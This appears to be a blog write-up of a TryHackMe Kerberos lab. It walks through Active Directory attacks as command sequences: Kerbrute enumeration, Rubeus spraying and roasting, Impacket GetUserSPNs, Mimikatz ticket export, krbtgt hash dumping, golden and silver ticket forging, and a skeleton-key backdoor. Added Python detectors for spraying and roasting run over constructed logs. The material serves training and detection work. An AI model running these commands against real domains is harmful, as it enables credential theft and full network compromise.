#kerberos
This is a follow-up write-up to "Active Directory enumeration and attacks for beginners". Credit to TryHackMe for a fantastic learning room.
Contents:
1. Enumeration with Kerbrute
2. Harvesting & Brute-Forcing Tickets — Rubeus
3. Brute forcing / password spraying with Rubeus
4. Kerberoasting — Rubeus & Impacket
5. AS-REP Roasting — Rubeus
6. Pass the Ticket with Mimikatz
7. Golden / Silver Ticket attacks — Mimikatz
8. Kerberos backdoors with Mimikatz
Let's begin.
1. Enumeration with Kerbrute
sudo ./kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local /tmp/User.txt
The output lists a number of valid usernames, which will be useful later. Make a note of them.
2. Harvesting & Brute-Forcing Tickets — Rubeus
Change to the directory containing Rubeus and run:
Rubeus.exe harvest /interval:30
- this tells Rubeus to harvest TGTs every 30 seconds
3. Brute forcing / password spraying with Rubeus
- When brute-forcing passwords, you use a single user account and a wordlist of passwords. (Source TryHackMe)
- With password spraying, you give a single password such as Password1 and "spray" it against all found user accounts in the domain to find which one may have that password. (Source TryHackMe)
First, add the domain controller to the Windows hosts file:
echo 10.10.78.84 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
The command below takes a given password, "sprays" it against all found users, and returns the .kirbi TGT for any user it matches.
Rubeus.exe brute /password:Password1 /noticket
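On the defensive side, both the Kerbrute enumeration in section 1 and the spray above leave a bulk of AS-REQ failures on the domain controller: event 4771 with status 0x18 (wrong password) for a spray, and event 4768 with status 0x6 (unknown principal) for guessing usernames. The detector below is an added example, not part of the original post or of TryHackMe's material; it runs over constructed event records and flags any source address that hits several distinct accounts with the same failure inside a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). The fields mirror Windows Security
# event 4771 (pre-auth failed, Status 0x18 = wrong password) and event 4768
# (TGT requested, Status 0x6 = client principal unknown).
EVENTS = [
    {"id": 4771, "time": "2024-01-01T10:00:00", "status": "0x18", "user": "machine1", "src": "10.10.78.50"},
    {"id": 4771, "time": "2024-01-01T10:00:01", "status": "0x18", "user": "sqlservice", "src": "10.10.78.50"},
    {"id": 4771, "time": "2024-01-01T10:00:02", "status": "0x18", "user": "httpservice", "src": "10.10.78.50"},
    {"id": 4771, "time": "2024-01-01T10:00:03", "status": "0x18", "user": "admin1", "src": "10.10.78.50"},
    {"id": 4768, "time": "2024-01-01T10:05:00", "status": "0x6", "user": "bob", "src": "10.10.78.51"},
    {"id": 4768, "time": "2024-01-01T10:05:01", "status": "0x6", "user": "alice", "src": "10.10.78.51"},
    {"id": 4768, "time": "2024-01-01T10:05:02", "status": "0x6", "user": "carol", "src": "10.10.78.51"},
    {"id": 4768, "time": "2024-01-01T10:05:03", "status": "0x6", "user": "dave", "src": "10.10.78.51"},
    {"id": 4768, "time": "2024-01-01T10:05:04", "status": "0x6", "user": "eve", "src": "10.10.78.51"},
    # one user mistyping their own password twice: benign, must not be flagged
    {"id": 4771, "time": "2024-01-01T11:00:00", "status": "0x18", "user": "machine1", "src": "10.10.78.52"},
    {"id": 4771, "time": "2024-01-01T11:00:09", "status": "0x18", "user": "machine1", "src": "10.10.78.52"},
]

# (event id, status) pairs that a spray or an enumeration run produces in bulk
SIGNATURES = {(4771, "0x18"): "password spray", (4768, "0x6"): "user enumeration"}

def detect_bulk_as_failures(events, min_accounts=4, window=timedelta(minutes=2)):
    """Return {src: (label, sorted accounts)} for every source address that
    hits min_accounts distinct usernames with the same failure inside window."""
    per_src = defaultdict(list)
    for e in events:
        key = (e["id"], e["status"])
        if key in SIGNATURES:
            per_src[(e["src"], key)].append(
                (datetime.fromisoformat(e["time"]), e["user"].lower()))
    hits = {}
    for (src, key), items in per_src.items():
        items.sort()
        # slide the window over the time-ordered failures from this source
        for i, (t0, _) in enumerate(items):
            accounts = {u for t, u in items[i:] if t - t0 <= window}
            if len(accounts) >= min_accounts:
                hits[src] = (SIGNATURES[key], sorted(accounts))
                break
    return hits
```

Tune min_accounts and window to the size of the domain; a helpdesk host resetting a few passwords in a row is the usual false positive.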
4. Kerberoasting — Rubeus & Impacket
This command will dump the hashes of all kerberoastable accounts:
Rubeus.exe kerberoast
It finds 2 accounts:
- httpservice
- sqlservice
Now you can crack the hash with hashcat mode 13100 (hashcat -m 13100).
(If you copy and paste from Windows to Linux you may need to remove the inserted spaces and line breaks; find-and-replace in any editor will do.)
Method 2 — Using Impacket
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.50.197 -request
Then crack the hash with the hashcat command from above.
5. AS-REP Roasting — Rubeus
Very similar to Kerberoasting, AS-REP Roasting dumps the krb5asrep hashes of user accounts that have Kerberos pre-authentication disabled. Unlike Kerberoasting, these users do not have to be service accounts; the only requirement to be able to AS-REP roast a user is that the user must have pre-authentication disabled. (Source TryHackMe)
Rubeus.exe asreproast
- transfer the output over to your box
IMPORTANT:
- Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User…..
- crack with hashcat
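Both roasting techniques in sections 4 and 5 are visible to the domain controller: a Kerberoast shows up as event 4769 service-ticket requests with encryption type 0x17 (RC4-HMAC, the type behind the $23$ in the hashes above) for several non-machine SPNs from one account, and an AS-REP roast as event 4768 with pre-authentication type 0 and the same RC4 type. The two detectors below are an added example written for this write-up, not TryHackMe's or Rubeus's code, and run over constructed event records.

```python
# Constructed sample events (not real logs). Fields mirror Windows Security
# event 4769 (TGS requested) and event 4768 (TGT requested). Encryption type
# 0x17 is RC4-HMAC, 0x12 is AES256; pre-auth type 2 is the normal encrypted
# timestamp and 0 means the client sent no pre-authentication at all.
EVENTS = [
    # one account pulling RC4 tickets for two SPNs back to back: Kerberoast shape
    {"id": 4769, "user": "machine1@CONTROLLER.LOCAL", "service": "httpservice",
     "etype": "0x17", "src": "10.10.78.50"},
    {"id": 4769, "user": "machine1@CONTROLLER.LOCAL", "service": "sqlservice",
     "etype": "0x17", "src": "10.10.78.50"},
    # AES ticket for a machine account service: ordinary traffic
    {"id": 4769, "user": "machine1@CONTROLLER.LOCAL", "service": "DESKTOP-1$",
     "etype": "0x12", "src": "10.10.78.50"},
    # krbtgt tickets are part of every logon and are never counted
    {"id": 4769, "user": "machine1@CONTROLLER.LOCAL", "service": "krbtgt",
     "etype": "0x17", "src": "10.10.78.50"},
    # TGT issued with no pre-authentication and RC4: AS-REP roast shape
    {"id": 4768, "user": "admin2", "preauth": 0, "etype": "0x17", "src": "10.10.78.51"},
    # ordinary logon: encrypted-timestamp pre-auth and AES
    {"id": 4768, "user": "machine1", "preauth": 2, "etype": "0x12", "src": "10.10.78.52"},
]

def detect_kerberoast(events, min_services=2):
    """Map requesting account -> sorted service names whenever one account
    obtains RC4 tickets for min_services or more distinct non-machine SPNs."""
    by_user = {}
    for e in events:
        svc = e.get("service", "")
        if (e["id"] == 4769 and e["etype"] == "0x17"
                and svc != "krbtgt" and not svc.endswith("$")):
            by_user.setdefault(e["user"], set()).add(svc)
    return {u: sorted(s) for u, s in by_user.items() if len(s) >= min_services}

def detect_asrep_roast(events):
    """List (user, src) for TGTs issued with pre-auth type 0 and RC4."""
    return [(e["user"], e["src"]) for e in events
            if e["id"] == 4768 and e.get("preauth") == 0 and e["etype"] == "0x17"]
```

Accounts that legitimately use RC4 (old appliances, accounts without AES keys) will trip the first check, so pair it with an inventory of which accounts still need that encryption type.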
6. Pass the Ticket — Mimikatz
mimikatz.exe
privilege::debug
- to export .kirbi tickets:
sekurlsa::tickets /export
It is best to look for an Administrator ticket issued by krbtgt (a TGT).
Now that we have the ticket, we can perform the pass-the-ticket attack.
- the exported tickets are listed in the output; note the Administrator ones at the top
- run the command below in mimikatz:
kerberos::ptt [0;2984d0]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
7. Golden / Silver Ticket attacks — Mimikatz
Dump the krbtgt hash
mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
- If you wanted to create a silver ticket, you would need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account. (Source TryHackMe.com)
Creating the Golden Ticket
In the command below you need to provide the domain SID, the krbtgt NTLM hash and the ID (ensure there are no spaces):
Kerberos::golden /user:Administrator /domain:controller.local /sid:<enterhere> /krbtgt:<enterhere> /id:<enterhere>
- for /id: enter 500 (the RID of the built-in Administrator account)
- and do not forget: no spaces in any of the values
*Silver Ticket*
To create a silver ticket, simply put a service NTLM hash into the krbtgt slot, the SID of the service account into sid, and change the id to 1103. (Source TryHackMe.com)
Use the Golden/Silver Ticket to access other machines
misc::cmd
Below information source is TryHackMe.com (inc image)
Access the machines that you want; what you can access will depend on the privileges of the user that you decided to take the ticket from. However, if you took the ticket from krbtgt you have access to the ENTIRE network, hence the name golden ticket. Silver tickets only have access to those resources that the user has access to; if it is a domain admin it can access almost the entire network, however it is slightly less elevated than a golden ticket.
8. Kerberos backdoors with mimikatz
A backdoor is much more stable than golden / silver tickets.
privilege::debug
misc::skeleton
- the above command installs the skeleton key with mimikatz
The below information source is TryHackMe.com
Accessing the forest -
The default credentials will be: “mimikatz”
example: net use c: \\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
- The share will now be accessible without the need for the Administrators password
example: dir \\Desktop-1\c$ /user:Machine1 mimikatz
- access the directory of Desktop-1 without ever knowing what users have access to Desktop-1
The skeleton key will not persist by itself because it runs in memory; it can be scripted or persisted using other tools and techniques, however that is out of scope for this room.
Credit and a huge thank you to TryHackMe.com — these rooms are invaluable to my development.
Any information taken from Try Hack Me and used in this document is marked as source TryHackMe(.com)